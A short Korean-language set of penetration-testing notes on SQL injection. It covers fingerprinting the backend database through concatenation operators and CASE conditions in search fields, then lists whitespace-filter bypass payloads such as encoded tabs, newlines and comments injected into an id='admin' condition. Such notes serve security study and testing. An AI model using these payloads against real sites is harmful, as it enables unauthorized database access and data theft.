SQL Injection

1️⃣ SQL Injection 취약점 점검 📜SQL Injection 에러 유/무 확인 취약점 유/무 확인 검색란의 경우, 연결연산자 사용 a. ’ ’ 로 사용하여 정상작동 한다면 (te’ ‘st), Mysql b. ‘+’ 로 사용하여 정상작동 한다면 (te’+‘st), Mssql c. ‘||’ 로 사용하여 정상작동 한다면 (te’||‘st), Oracle 조건 구문 완성 📜방법론 1) 검색기능에 대한 취약점 점검 a. select * from board where title like ‘% ‘||(case when 1=1 then ’test’ else ‘aaaa’ end)||’ %’...

1️⃣ SQL Injection 우회기법 📜SQL Injection 공격시 공백 문자 필터링시 우회 방법 Tab : %09 - no=1%09or%09id=‘admin’ Line Feed (\n): %0a - no=1%0aor%0aid=‘admin’ Carrage Return(\r) : %0d - no=1%0dor%0did=‘admin’ 주석 : /**/ - no=1//or//id=‘admin’ 괄호 : () - no=(1)or(id=‘admin’) 더하기 : + - no=1+or+id=‘admin’